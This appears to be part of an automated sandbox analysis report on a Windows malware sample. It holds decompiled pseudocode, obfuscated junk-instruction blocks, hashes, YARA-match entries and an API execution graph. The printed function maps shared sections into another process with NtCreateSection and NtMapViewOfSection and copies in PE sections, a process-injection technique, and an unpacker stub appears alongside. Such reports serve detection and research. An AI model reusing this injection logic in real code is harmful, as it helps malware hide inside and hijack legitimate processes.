				_t151 = ((_t146 ^  *(_t217 + 3)) +  *((intOrPtr*)(_t224 + 0xd)) |  *(_t227 + 0xd)) +  *((intOrPtr*)(_t229 + 0x12)) +  *((intOrPtr*)(_t234 + 0xc));
				_pop(_t236);
				do {
					_pop(_t237);
					_pop(_t238);
					asm("sbb al, 0x5f");
					_pop(_t240);
					_t155 = (_t151 -  *((intOrPtr*)(_t236 + 0x3a)) ^  *(_t237 + 3)) -  *((intOrPtr*)(_t238 + 0x2d)) -  *((intOrPtr*)(_t240 + 0x1c));
					_pop(_t241);
					 *(_t241 + 0x31) =  *(_t241 + 0x31) ^ _t155;
					_pop(_t242);
					_t156 = _t155 -  *((intOrPtr*)(_t242 + 0x2d));
					_pop(_t243);
					 *(_t243 + 0x33) =  *(_t243 + 0x33) ^ _t156;
					_pop(_t245);
					_pop(_t246);
					 *(_t246 + 0x2a) =  *(_t246 + 0x2a) ^ _t156 +  *((intOrPtr*)(_t245 + 0x1a));
					asm("sbb al, 0x5f");
					_t100 = _t95 - 0xffffffffcea0c600 | 0x5f;
					_push(ss);
					asm("popad");
					asm("aaa");
					_t151 = _t100;
					_pop(_t236);
					_t95 = _t100 ^ 0x670ca01f;
					asm("salc");
					asm("sbb dh, [edi+0xca00f09]");
				} while (_t95 > 0);
				_t180 = _t179 -  *((intOrPtr*)(_t236 + 0xd9b0ad2));
				asm("wait");
				 *_t180 =  *_t180 << _t174;
				asm("sbb [ebx+0x5f], bl");
				asm("salc");
				asm("sbb [edi-0x68], dl");
				asm("sbb [ebx+0x1f], dl");
				asm("sbb [edi+0x5f], cl");
				asm("sbb [ebx+0x5f], cl");
				 *0xbb0ad256 =  *0xbb0ad256 | _t180;
				asm("ficomp dword [edi+0x5f99da50]");
				asm("ror byte [edx], cl");
				_pop(_t301);
				asm("iretd");
				asm("stosd");
				asm("ror byte [edx], cl");
				asm("stosd");
				asm("ficomp dword [edi+0x22dc262a]");
				_t302 = _t301 -  *((intOrPtr*)(_t306 + (_t180 &  *0xFFFFFFFFFCDB506C) * 8));
				asm("sbb ch, [ebx-0x29b4e02c]");
				asm("sbb ah, [edi+0x2264a06e]");
				asm("cmpsd");
				asm("ror byte [edx], cl");
				 *(( *0x5f5fcfcc - 0x0000003c ^ 0x355f355f) - 0x335f44d6) =  *(( *0x5f5fcfcc - 0x0000003c ^ 0x355f355f) - 0x335f44d6) |  *0x5f5fcfcc - 0x0000003c ^ 0x355f355f;
				asm("retf");
				asm("fcomp qword [edx]");
				asm("scasd");
				asm("ror byte [edx], cl");
				 *( *0x5f35af2a - 0x335f44d6) =  *( *0x5f35af2a - 0x335f44d6) |  *0x5f35af2a;
				asm("retf");
				asm("ficomp dword [edi+0x22dc482a]");
				asm("sbb ch, [edi+0xf4f1fd2]");
				asm("pushfd");
				asm("arpl [eax+0xca0bb2a], sp");
				asm("arpl sp, bx");
				asm("cdq");
				 *0x5f5f5f5f =  *0x1a9858b4;
				 *(_t302 + 0x37900d8d) =  *(_t302 + 0x37900d8d) & 0x0000007b;
			}




















































                    0x0040221b
                    0x0040221b
                    0x0040221b
                    0x0040221b
                    0x0040220d
                    0x00402212
                    0x00402215
                    0x0040221f
                    0x00402225
                    0x0040222b
                    0x0040222d
                    0x0040223e
                    0x0040223f
                    0x00402245
                    0x00402246
                    0x0040224e
                    0x00402250
                    0x00402253
                    0x00402259
                    0x0040225d
                    0x0040225e
                    0x00402267
                    0x0040226c
                    0x00402271
                    0x00402279
                    0x00402280
                    0x00402282
                    0x00402286
                    0x00402289
                    0x0040228e
                    0x00402295
                    0x00402299
                    0x0040229a
                    0x004022a5
                    0x004022a6
                    0x004022a9
                    0x004022aa
                    0x004022ad
                    0x004022ae
                    0x004022b1
                    0x004022b2
                    0x004022bb
                    0x004022bc
                    0x004022bf
                    0x004022c0
                    0x004022c3
                    0x004022ca
                    0x004022d1
                    0x004022d6
                    0x004022db
                    0x004022dc
                    0x004022e3
                    0x004022ea
                    0x004022ec
                    0x004022f0
                    0x004022f3
                    0x004022f4
                    0x004022f8
                    0x004022fa
                    0x004022ff
                    0x00402303
                    0x00402304
                    0x0040230f
                    0x00402310
                    0x00402313
                    0x00402314
                    0x00402317
                    0x00402318
                    0x0040231b
                    0x0040231c
                    0x00402325
                    0x00402329
                    0x0040232a
                    0x00402334
                    0x00402336
                    0x00402338
                    0x0040233f
                    0x00402347
                    0x00402348
                    0x0040234b
                    0x0040234c
                    0x00402351
                    0x00402352
                    0x00402352
                    0x0040235a
                    0x00402365
                    0x00402366
                    0x00402370
                    0x00402376
                    0x00402377
                    0x0040237a
                    0x00402381
                    0x00402388
                    0x0040238e
                    0x0040239b
                    0x004023a3
                    0x004023ac
                    0x004023b2
                    0x004023ca
                    0x004023cb
                    0x004023d4
                    0x004023e0
                    0x004023e8
                    0x004023eb
                    0x004023f1
                    0x004023f7
                    0x004023fa
                    0x00402404
                    0x0040240a
                    0x00402414
                    0x00402422
                    0x00402423
                    0x0040242f
                    0x00402435
                    0x00402439
                    0x00402444
                    0x0040244c
                    0x00402462
                    0x0040246e
                    0x00402470
                    0x0040247b
                    0x00402482

                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 43f15bd3062a4760c481f29c73abec842921584a995323407381a9c6276da2ee
                    • Instruction ID: 8d9ad5fc92841c5ff350025d079413b2a1f020c5f49b95558387f87c6b5b2f86
                    • Opcode Fuzzy Hash: 43f15bd3062a4760c481f29c73abec842921584a995323407381a9c6276da2ee
                    • Instruction Fuzzy Hash: EB51432F35A6C2EAC7058E7EF9958DDBF20FDC66353085677C28489D43C711A0ABD6A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00602282 Relevance: .2, Instructions: 220COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_600000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8d4a724cb870bcb18da757ab44d0a1e7f8e07ac8f8118f6b51f2ac268e752a64
                    • Instruction ID: cfbbe9443ec8a0a2100398618d48eb4f7df5a37ed4487c56a580f45ab1c896d0
                    • Opcode Fuzzy Hash: 8d4a724cb870bcb18da757ab44d0a1e7f8e07ac8f8118f6b51f2ac268e752a64
                    • Instruction Fuzzy Hash: 9051412F35A6C2EAC7058E7EF9958DDBF20FDC66353085677C28489D43C711A0ABD6A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402F3B Relevance: .1, Instructions: 120COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8c4a1b41f7ffe6c34f8868a4d146c2a895fd91472b977c83164233cef36a9efb
                    • Instruction ID: c842fcc63f07856b9123f6bc5472d278ca1dc6043060281b8ef7a5d9e1871927
                    • Opcode Fuzzy Hash: 8c4a1b41f7ffe6c34f8868a4d146c2a895fd91472b977c83164233cef36a9efb
                    • Instruction Fuzzy Hash: D731255284E2C25FC73357704DAE9EBBF74A86324474E41DBD0D19B5E3D2A8880BD39A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00656842 Relevance: .1, Instructions: 61COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.378830916.0000000000652000.00000040.00000020.00020000.00000000.sdmp, Offset: 00652000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_652000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction ID: b956a75e1d9b5c1294435be921c44c7570a880ce7947e71003949f52e35d7c6f
                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction Fuzzy Hash: 6E117C72340100AFEB44DE55DC81EA673EAEB88361B698169FD09CB312D676EC06C760
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00600D90 Relevance: .0, Instructions: 43COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_600000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction ID: 0d8b75db3329e727e2f298a538b10a5da1ac7c04e1debf53f6a48a6320adb0d8
                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction Fuzzy Hash: FD01A7766406048FEF25CF64C804BEB33E6EF85315F4544E5D506973C2E774A9418B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B45C Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 204COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040B46C
                    • __isctype_l.LIBCMT ref: 0040B4DF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.378507056.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                    Similarity
                    • API ID: Locale$UpdateUpdate::___isctype_l
                    • String ID: $$+$-$0$0
                    • API String ID: 2547950892-4042548909
                    • Opcode ID: 1d2ed6883e4ca65e4a166239b617743e04a1b9863ee11bc6d2853cc455e2acaa
                    • Instruction ID: 97537141d6d2858a3edd09e828bcdb1ecb2a0de928e4cfbf47729112040edc5f
                    • Opcode Fuzzy Hash: 1d2ed6883e4ca65e4a166239b617743e04a1b9863ee11bc6d2853cc455e2acaa
                    • Instruction Fuzzy Hash: 3B71D270900249AADF25CF28C9557AB7BA0EF51358F2805BBE851B62D1C3398E91C7DE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B81A Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.378507056.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                    Similarity
                    • API ID: __fileno__flsbuf__flush__locking
                    • String ID:
                    • API String ID: 2259706978-0
                    • Opcode ID: 6bde799d7cffcce2465a4719f02d4e34f410e9838aed0f3b52363691e32db9a3
                    • Instruction ID: d9b0b9fd459113351f921aa778dd8b20b1cf5d34ba7c7a55e35930b3a3d7b7cc
                    • Opcode Fuzzy Hash: 6bde799d7cffcce2465a4719f02d4e34f410e9838aed0f3b52363691e32db9a3
                    • Instruction Fuzzy Hash: B1418272A006059BDB24AF65888459FBBB9EF80360B24C53EE865B72D0D778DD419B8C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004123A5 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.378507056.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                    • Instruction ID: 8f06ba0e6be14d774fc29792ef997f0c6ad8488ad82e83f8fd62a1598589dc5c
                    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                    • Instruction Fuzzy Hash: D5118C3204014EBBCF165F85DD01CEE3F62BB18354B588416FE2898131D37AC9B2AB96
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:4%
                    Dynamic/Decrypted Code Coverage:41.3%
                    Signature Coverage:0%
                    Total number of Nodes:189
                    Total number of Limit Nodes:7
                    execution_graph 8573 411b01 8576 411975 8573->8576 8577 411989 _LocaleUpdate::_LocaleUpdate 8576->8577 8584 415461 8577->8584 8579 411995 8580 4119a9 8579->8580 8588 41531e 8579->8588 8582 415461 __forcdecpt_l RtlAllocateHeap 8580->8582 8583 4119b2 8582->8583 8585 41547f 8584->8585 8586 41546f 8584->8586 8593 41534c 8585->8593 8586->8579 8589 41532c 8588->8589 8590 41533e 8588->8590 8589->8579 8610 4152cd 8590->8610 8594 415361 _LocaleUpdate::_LocaleUpdate 8593->8594 8595 41536d 8594->8595 8597 4153c1 __isleadbyte_l 8594->8597 8596 4126f4 __isctype_l RtlAllocateHeap 8595->8596 8598 415385 8595->8598 8596->8598 8600 4148b5 8597->8600 8598->8586 8601 4148c8 _LocaleUpdate::_LocaleUpdate 8600->8601 8604 414510 8601->8604 8603 4148e8 8603->8598 8605 414531 ___ansicp 8604->8605 8606 415bd5 ___convertcp RtlAllocateHeap 8605->8606 8607 4145a6 __freea 8605->8607 8608 41479d 8606->8608 8607->8603 8608->8607 8609 415bd5 ___convertcp RtlAllocateHeap 8608->8609 8609->8607 8611 4152e0 _LocaleUpdate::_LocaleUpdate 8610->8611 8612 4152fa 8611->8612 8613 4126f4 __isctype_l RtlAllocateHeap 8611->8613 8612->8579 8613->8612 8626 40c182 8627 41065a __calloc_crt RtlAllocateHeap 8626->8627 8628 40c18e 8627->8628 8614 40ffc5 8616 40ffec 8614->8616 8615 4143c0 ___crtGetStringTypeA RtlAllocateHeap 8617 410066 8615->8617 8616->8615 8621 4100ab 8616->8621 8618 4148b5 ___crtLCMapStringA RtlAllocateHeap 8617->8618 8619 410086 8618->8619 8620 4148b5 ___crtLCMapStringA RtlAllocateHeap 8619->8620 8620->8621 8417 401446 8418 40144c 8417->8418 8419 4014d8 NtDuplicateObject 8418->8419 8421 4015f4 8418->8421 8420 4014f5 NtCreateSection 8419->8420 8419->8421 8422 401575 NtCreateSection 8420->8422 8423 40151b NtMapViewOfSection 8420->8423 8422->8421 8425 4015a1 8422->8425 8423->8422 8424 40153e NtMapViewOfSection 8423->8424 8424->8422 8426 40155c 8424->8426 8425->8421 8427 4015ab NtMapViewOfSection 8425->8427 8426->8422 8427->8421 8428 4015d2 NtMapViewOfSection 8427->8428 8428->8421 8622 4029c8 8624 402997 8622->8624 8623 4017f4 8 API calls 8625 402b73 8623->8625 8624->8622 8624->8623 8624->8625 8360 402aea 8361 402ad8 8360->8361 8363 402b73 8361->8363 8364 4017f4 8361->8364 8365 401805 8364->8365 8366 40182d Sleep 8365->8366 8367 401848 8366->8367 8368 401859 8367->8368 8370 40143b 8367->8370 8368->8363 8371 40144c 8370->8371 8372 4014d8 NtDuplicateObject 8371->8372 8374 4015f4 8371->8374 8373 4014f5 NtCreateSection 8372->8373 8372->8374 8375 401575 NtCreateSection 8373->8375 8376 40151b NtMapViewOfSection 8373->8376 8375->8374 8378 4015a1 8375->8378 8376->8375 8377 40153e NtMapViewOfSection 8376->8377 8377->8375 8379 40155c 8377->8379 8378->8374 8380 4015ab NtMapViewOfSection 8378->8380 8379->8375 8380->8374 8381 4015d2 NtMapViewOfSection 8380->8381 8381->8374 8382 40c96a 8384 40c977 ___initmbctable 8382->8384 8386 40c985 8384->8386 8388 41065a 8384->8388 8385 41065a __calloc_crt RtlAllocateHeap 8387 40c9ac 8385->8387 8387->8385 8387->8386 8391 410663 8388->8391 8390 4106a0 8390->8387 8391->8390 8392 4148fa 8391->8392 8394 414906 __lock ___sbh_alloc_block _realloc __lseeki64 __calloc_impl 8392->8394 8393 4149af RtlAllocateHeap 8393->8394 8394->8393 8395 41491e __lseeki64 8394->8395 8395->8391 8543 40b68b 8544 40b6a4 8543->8544 8547 40b45c 8544->8547 8549 40b471 _LocaleUpdate::_LocaleUpdate 8547->8549 8550 40b483 8549->8550 8551 4126f4 8549->8551 8553 412708 __isleadbyte_l _LocaleUpdate::_LocaleUpdate 8551->8553 8552 412715 8552->8549 8553->8552 8555 4143c0 8553->8555 8556 4143d3 _LocaleUpdate::_LocaleUpdate 8555->8556 8559 414206 8556->8559 8558 4143f0 8558->8552 8560 414227 ___ansicp 8559->8560 8562 41423f __freea 8560->8562 8563 415bd5 8560->8563 8562->8558 8564 415c9f __freea 8563->8564 8566 415c15 8563->8566 8564->8562 8565 41065a __calloc_crt RtlAllocateHeap 8565->8564 8566->8564 8566->8565 8398 53003c 8399 530049 8398->8399 8411 530e0f SetErrorMode SetErrorMode 8399->8411 8404 530265 8405 5302ce VirtualProtect 8404->8405 8407 53030b 8405->8407 8406 530439 VirtualFree 8410 5304be LoadLibraryA 8406->8410 8407->8406 8409 5308c7 8410->8409 8412 530223 8411->8412 8413 530d90 8412->8413 8414 530dad 8413->8414 8415 530dbb GetPEB 8414->8415 8416 530238 VirtualAlloc 8414->8416 8415->8416 8416->8404 8505 530001 8506 530005 8505->8506 8511 53092b GetPEB 8506->8511 8508 530030 8513 53003c 8508->8513 8512 530972 8511->8512 8512->8508 8514 530049 8513->8514 8515 530e0f 2 API calls 8514->8515 8516 530223 8515->8516 8517 530d90 GetPEB 8516->8517 8518 530238 VirtualAlloc 8517->8518 8519 530265 8518->8519 8520 5302ce VirtualProtect 8519->8520 8522 53030b 8520->8522 8521 530439 VirtualFree 8525 5304be LoadLibraryA 8521->8525 8522->8521 8524 5308c7 8525->8524 8567 40a554 8568 40a560 __lseeki64 8567->8568 8569 41065a __calloc_crt RtlAllocateHeap 8568->8569 8572 40a581 8569->8572 8570 40a669 ___lock_fhandle __lseeki64 8571 41065a __calloc_crt RtlAllocateHeap 8571->8572 8572->8570 8572->8571 8526 530005 8527 53092b GetPEB 8526->8527 8528 530030 8527->8528 8529 53003c 7 API calls 8528->8529 8530 530038 8529->8530 8465 40907c 8469 40909e __fassign 8465->8469 8466 40928e 8468 4090b2 8466->8468 8478 410f7e 8466->8478 8469->8466 8469->8468 8475 4111c9 8469->8475 8472 4111c9 __fassign RtlAllocateHeap 8473 4092a7 8472->8473 8473->8466 8474 4111c9 __fassign RtlAllocateHeap 8473->8474 8474->8466 8481 410f9e 8475->8481 8493 410eb2 8478->8493 8480 410f99 8480->8468 8482 410fb2 _LocaleUpdate::_LocaleUpdate 8481->8482 8484 409287 8482->8484 8485 41522c 8482->8485 8484->8466 8484->8472 8487 41523c 8485->8487 8488 415241 8487->8488 8489 41513a 8487->8489 8488->8484 8490 415160 ___ascii_strnicmp 8489->8490 8492 415150 _LocaleUpdate::_LocaleUpdate 8489->8492 8490->8488 8491 41534c RtlAllocateHeap __tolower_l 8491->8492 8492->8490 8492->8491 8494 410ebe __lseeki64 8493->8494 8496 410ed1 __sopen_helper __lseeki64 8494->8496 8497 410793 8494->8497 8496->8480 8498 4107b8 __get_daylight 8497->8498 8500 41081c 8 library calls 8498->8500 8501 413281 8498->8501 8500->8496 8503 41328d __lock ___lock_fhandle __alloc_osfhnd __mtinitlocknum __lseeki64 8501->8503 8502 4132a2 ___lock_fhandle __alloc_osfhnd __lseeki64 8502->8500 8503->8502 8504 41065a __calloc_crt RtlAllocateHeap 8503->8504 8504->8502 8396 40ce1f HeapCreate 8397 40ce43 8396->8397 8531 40181f 8532 401828 8531->8532 8533 40182d Sleep 8532->8533 8534 401848 8533->8534 8535 40143b 7 API calls 8534->8535 8536 401859 8534->8536 8535->8536

                    Executed Functions

                    Function 0040143B Relevance: 10.7, APIs: 7, Instructions: 189nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 85 40143b-401444 86 40145b 85->86 87 40144c-401457 85->87 86->87 88 40145e-401482 call 401134 86->88 87->88 94 401484 88->94 95 401487-40148c 88->95 94->95 97 4017b2-4017ba 95->97 98 401492-4014a3 95->98 97->95 101 4017b0-4017d3 98->101 102 4014a9-4014d2 98->102 110 4017e5 101->110 102->101 109 4014d8-4014ef NtDuplicateObject 102->109 109->101 111 4014f5-401519 NtCreateSection 109->111 113 401575-40159b NtCreateSection 111->113 114 40151b-40153c NtMapViewOfSection 111->114 113->101 118 4015a1-4015a5 113->118 114->113 116 40153e-40155a NtMapViewOfSection 114->116 116->113 119 40155c-401572 116->119 118->101 120 4015ab-4015cc NtMapViewOfSection 118->120 119->113 120->101 121 4015d2-4015ee NtMapViewOfSection 120->121 121->101 123 4015f4 call 4015f9 121->123
                    C-Code - Quality: 54%
                    			E0040143B(void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				long _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				long _v56;
				long _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				void* __edi;
				void* __ebp;
				intOrPtr _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr* _t108;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t126;
				long* _t129;
				signed int _t136;
				int _t137;
				intOrPtr _t154;
				void* _t159;
				intOrPtr* _t160;
				void* _t163;
				void* _t170;
				long _t171;
				intOrPtr _t172;
				void* _t173;
				long* _t178;
				intOrPtr* _t179;
				HANDLE* _t180;
				HANDLE* _t181;
				void* _t186;
				void* _t187;
				intOrPtr* _t190;
				void* _t191;
				intOrPtr _t194;
				intOrPtr* _t195;
				void* _t196;
				void* _t197;
				intOrPtr* _t198;
				long _t216;
				void* _t222;

				_push(0x1474);
				_t84 =  *_t195;
				_t196 = _t195 + 4;
				E00401134(_t84, _t170, __eflags, _t222);
				_t126 = _a4;
				_t171 = 0;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t126 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
				}
				_v96 = _t87;
				_t178 =  &_v100;
				 *_t178 = _t171;
				 *((intOrPtr*)(_t126 + 0x4c))(_t87, _t178);
				_t90 =  *_t178;
				if(_t90 != 0) {
					_t129 =  &_v52;
					 *_t129 = _t90;
					_t129[1] = _t171;
					_t179 =  &_v44;
					 *((intOrPtr*)(_t126 + 0x10))(_t179, 0x18);
					 *_t179 = 0x18;
					_push( &_v52);
					_push(_t179);
					_push(0x40);
					_push( &_v20);
					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t171, _t171, 2) == 0) {
						_v12 = _t171;
						_t98 =  &_v84;
						 *(_t98 + 4) = _t171;
						 *_t98 = 0x5000;
						_t180 =  &_v88;
						if(NtCreateSection(_t180, 6, _t171, _t98, 4, 0x8000000, _t171) == 0) {
							_push(_v84);
							_pop( *_t25);
							_t120 =  &_v72;
							 *_t120 = _t171;
							if(NtMapViewOfSection( *_t180, 0xffffffff, _t120, _t171, _t171, _t171,  &_v60, 1, _t171, 4) == 0) {
								_t122 =  &_v64;
								 *_t122 = _t171;
								if(NtMapViewOfSection( *_t180, _v16, _t122, _t171, _t171, _t171,  &_v60, 1, _t171, 4) == 0) {
									_t194 = _v72;
									 *((intOrPtr*)(_t126 + 0x20))(_t171, _t194, 0x104);
									 *((intOrPtr*)(_t194 + 0x208)) = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t100 =  &_v84;
						 *(_t100 + 4) = _t171;
						 *_t100 = _a12 + 0x10000;
						_t181 =  &_v92;
						if(NtCreateSection(_t181, 0xe, _t171, _t100, 0x40, 0x8000000, _t171) == 0 && _v12 != 0) {
							_push(_v84);
							_pop( *_t46);
							_t102 =  &_v76;
							 *_t102 = _t171;
							if(NtMapViewOfSection( *_t181, 0xffffffff, _t102, _t171, _t171, _t171,  &_v60, 1, _t171, 4) == 0) {
								_t104 =  &_v68;
								 *_t104 = _t171;
								_t216 = NtMapViewOfSection( *_t181, _v16, _t104, _t171, _t171, _t171,  &_v60, 1, _t171, 0x20);
								if(_t216 == 0) {
									L21();
									if(_t216 == 0 && _t216 != 0) {
										asm("xlatb");
										asm("rcl dword [ebx], 0x8b");
									}
									_t197 = _t196 + 4;
									_push(0x2eb0);
									_t198 = _t197 + 4;
									_push(0x2260);
									_t154 =  *_t198;
									_push(_t154);
									asm("lodsb");
									asm("loop 0xffffffc9");
									_t186 = _a8 +  *_a8;
									_t136 =  *(_t186 + 6) & 0x0000ffff;
									_push(_t186);
									_t159 = _t186;
									if(_v56 == 0) {
										_t160 = _t159 + 0xf8;
										__eflags = _t160;
									} else {
										_t160 = _t159 + 0x108;
									}
									_push(_t136);
									_t137 =  *(_t160 + 0x10);
									if(_t137 != 0) {
										memcpy( *((intOrPtr*)(_t160 + 0xc)) + _v76,  *((intOrPtr*)(_t160 + 0x14)) + _a8, _t137);
									}
									asm("loop 0xffffffe6");
									_pop(_t187);
									if(_v56 == 0) {
										_push(_t187);
										_t163 =  *((intOrPtr*)(_t187 + 0x34)) - _v68;
										_t190 =  *((intOrPtr*)(_t187 + 0xa0)) + _v76;
										__eflags = _t190;
										while(1) {
											__eflags =  *_t190;
											if( *_t190 == 0) {
												break;
											}
											_t172 =  *_t190;
											_t190 = _t190 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t163;
												__eflags =  *((intOrPtr*)(0 + _v76 + _t172));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t191);
										_t171 = 0;
										__eflags = 0;
										_t108 =  &_v8;
										 *_t108 = 0;
										 *((intOrPtr*)(_t126 + 0x98))(_v16, 0, 0, 0, 0, 0,  *((intOrPtr*)(_t191 + 0x28)) + _v68, _v64, _t108, 0);
									} else {
										L54();
										_pop(_t173);
										_t171 = _t173 - 0x16ee;
										 *((intOrPtr*)(_t171 + 0x1722)) = _t171 + 0x2bbb;
										L004011C3();
										0x33(_t171 + 0x2bbb, 0x1ad);
										 *((intOrPtr*)(_t171 + 0x1747)) = _t171 + 0x2c0b;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x1474;
				_push(0x379);
			}




























































                    0x0040144c
                    0x00401451
                    0x00401454
                    0x0040146f
                    0x00401474
                    0x00401477
                    0x00401479
                    0x00401482
                    0x00401484
                    0x00401484
                    0x00401487
                    0x00401487
                    0x0040148c
                    0x00000000
                    0x00000000
                    0x004017b7
                    0x004017b7
                    0x00401492
                    0x00401495
                    0x00401498
                    0x0040149c
                    0x0040149f
                    0x004014a3
                    0x004014a9
                    0x004014ac
                    0x004014ae
                    0x004014b1
                    0x004014b7
                    0x004014ba
                    0x004014c8
                    0x004014c9
                    0x004014ca
                    0x004014cc
                    0x004014d2
                    0x004014f5
                    0x004014f8
                    0x004014fb
                    0x004014fe
                    0x00401504
                    0x00401519
                    0x0040151b
                    0x0040151e
                    0x00401521
                    0x00401524
                    0x0040153c
                    0x0040153e
                    0x00401541
                    0x0040155a
                    0x0040155c
                    0x00401566
                    0x0040156c
                    0x00401572
                    0x00401572
                    0x0040155a
                    0x0040153c
                    0x00401575
                    0x00401581
                    0x00401584
                    0x00401586
                    0x0040159b
                    0x004015ab
                    0x004015ae
                    0x004015b1
                    0x004015b4
                    0x004015cc
                    0x004015d2
                    0x004015d5
                    0x004015ec
                    0x004015ee
                    0x004015f4
                    0x004015f9
                    0x004015fd
                    0x004015fe
                    0x004015fe
                    0x00401603
                    0x00401628
                    0x00401630
                    0x00401642
                    0x00401647
                    0x00401659
                    0x0040167e
                    0x0040168b
                    0x004016a9
                    0x004016ab
                    0x004016af
                    0x004016b0
                    0x004016b6
                    0x004016c0
                    0x004016c0
                    0x004016b8
                    0x004016b8
                    0x004016b8
                    0x004016c6
                    0x004016c7
                    0x004016cc
                    0x004016da
                    0x004016da
                    0x004016e0
                    0x004016e2
                    0x004016e7
                    0x0040174f
                    0x00401753
                    0x0040175e
                    0x0040175e
                    0x00401761
                    0x00401761
                    0x00401764
                    0x00000000
                    0x00000000
                    0x00401766
                    0x00401770
                    0x00401775
                    0x00401777
                    0x0040177c
                    0x00401788
                    0x00401788
                    0x00401788
                    0x0040178a
                    0x0040178a
                    0x0040178e
                    0x00401795
                    0x00401795
                    0x00401797
                    0x0040179a
                    0x004017aa
                    0x004016e9
                    0x004016e9
                    0x004016ee
                    0x004016ef
                    0x00401705
                    0x00401714
                    0x00401721
                    0x00401738
                    0x00401746
                    0x00401746
                    0x004016e7
                    0x004015ee
                    0x004015cc
                    0x0040159b
                    0x004014d2
                    0x004017cb
                    0x004017db

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
